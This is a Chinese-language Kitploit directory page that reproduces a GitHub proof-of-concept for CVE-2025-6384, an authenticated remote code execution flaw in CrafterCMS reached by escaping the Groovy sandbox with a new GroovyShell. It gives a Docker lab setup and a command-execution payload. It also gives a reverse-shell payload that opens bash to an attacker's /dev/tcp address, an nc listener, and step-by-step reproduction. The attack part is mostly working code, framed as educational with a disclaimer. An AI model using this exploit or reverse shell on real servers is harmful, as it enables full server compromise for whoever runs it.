Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CrafterCMS-CVE-2025-6384 — 针对 CrafterCMS 中通过 Groovy 沙箱绕过实现的已认证远程代码执行(RCE)漏洞(CVE-2025-6384)的 PoC 利用代码。 | Kitploit
工具/GitHubGitHub/maestro-ant/craftercms-cve-2025-6384
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubmaestro-ant/craftercms-cve-2025-6384

CrafterCMS-CVE-2025-6384

针对 CrafterCMS 中通过 Groovy 沙箱绕过实现的已认证远程代码执行(RCE)漏洞(CVE-2025-6384)的 PoC 利用代码。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
411个月前尚未审核
分享

CrafterCMS 认证后的RCE - Groovy沙箱绕过 (CVE-2025-6384)

这是针对 CrafterCMS 中认证后远程代码执行漏洞的概念验证。

漏洞概要

拥有开发者权限的认证用户可以绕过 Crafter Studio 中的 Groovy 脚本沙箱,实现远程代码执行(RCE)。该沙箱未能阻止实例化新的 GroovyShell,而后者可用于创建新的、无限制的执行环境。

  • 产品: CrafterCMS
  • 组件: Crafter Studio
  • 漏洞: 通过 Groovy 沙箱绕过实现认证后RCE (CWE-913)
  • 影响: 服务器完全沦陷

实验环境搭建/部署

你可以使用官方 Docker Compose 文件快速部署一个易受攻击的 CrafterCMS 实例用于测试。

  1. 从 CrafterCMS 克隆 docker-compose 仓库:

    root@kitploit:~
    git clone https://github.com/craftercms/docker-compose.git
    
  2. 进入创作环境目录:

    root@kitploit:~
    cd docker-compose/authoring
    
  3. 启动容器。这将下载必要的镜像并启动 CrafterCMS 栈。

    root@kitploit:~
    docker-compose up
    

    (注意:根据你的 Docker 安装情况,可能需要使用 sudo。)

  4. 等待服务完全初始化。你可以通过 http://localhost:8080/studio 访问 Crafter Studio。

    • 默认用户名: admin
    • 默认密码: admin

概念验证(PoC)

虽然沙箱正确地阻止了直接执行方法,但它允许以下有效载荷,该载荷会创建一个新的、无沙箱的 Groovy shell。

root@kitploit:~
// 文件: /scripts/interceptors/pwn.groovy

def shell = new GroovyShell()
def command = "id" // <-- 在此处输入你的命令
def result = shell.evaluate("'''${command}'''.execute().text")

// 输出将被打印到服务器日志中
System.err.println("[RCE-PoC] " + result)

RCE 漏洞利用:反弹 Shell

该有效载荷演示了完整的RCE,通过建立反向连接回到攻击者控制的机器。

1. 启动监听器

在你的机器上启动一个监听器(例如,使用 netcat)来接收传入的连接:

root@kitploit:~
nc -lvnp 4444

2. 准备有效载荷

使用以下 Groovy 脚本作为你的有效载荷。请记得将 <YOUR_IP> 和 <YOUR_PORT> 替换为你的监听器的 IP 地址和端口。

root@kitploit:~
// 文件: /scripts/interceptors/exploit.groovy

def attacker_ip = "<YOUR_IP>"
def attacker_port = "4444" // 或者 <YOUR_PORT>

def cmd = "bash -i >& /dev/tcp/" + attacker_ip + "/" + attacker_port + " 0>&1"
def shell = new GroovyShell()

// 使用三重引号方便地处理命令字符串
shell.evaluate("""
    new ProcessBuilder("/bin/bash", "-c", "${cmd}").start()
""")

System.err.println("反弹 Shell 有效载荷已执行。")

复现步骤

  1. 使用默认凭据 (admin / admin) 登录 Crafter Studio (http://localhost:8080/studio)。

  2. 导航到 Site Config -> Scripts。

  3. 在“Groovy 脚本”部分点击 Create/Edit Script。

    图片
  4. 选择一个会被执行的脚本类型,例如 Request Interceptor。

  5. 将 PoC 有效载荷粘贴到脚本编辑器中并保存。

    图片
  6. 通过访问网站上的任意页面(例如 http://localhost:8080)来触发该脚本。

  7. 检查服务器的标准错误日志来查看命令输出。

    • 对于 PoC,找到你的容器 ID 并检查其日志以获取命令输出:
    root@kitploit:~
    docker-compose logs -f crafter
    

    预期输出:

    root@kitploit:~
    GroovyShell: uid=1000(crafter) gid=1000(crafter) groups=1000(crafter)
    
    图片
    • 对于 反弹 Shell,检查你的 netcat 监听器。你应该会从容器收到一个 shell 会话。

免责声明

此材料仅用于教育和研究目的。作者不对因使用此信息而导致的任何滥用或损害负责。

下载工具
图片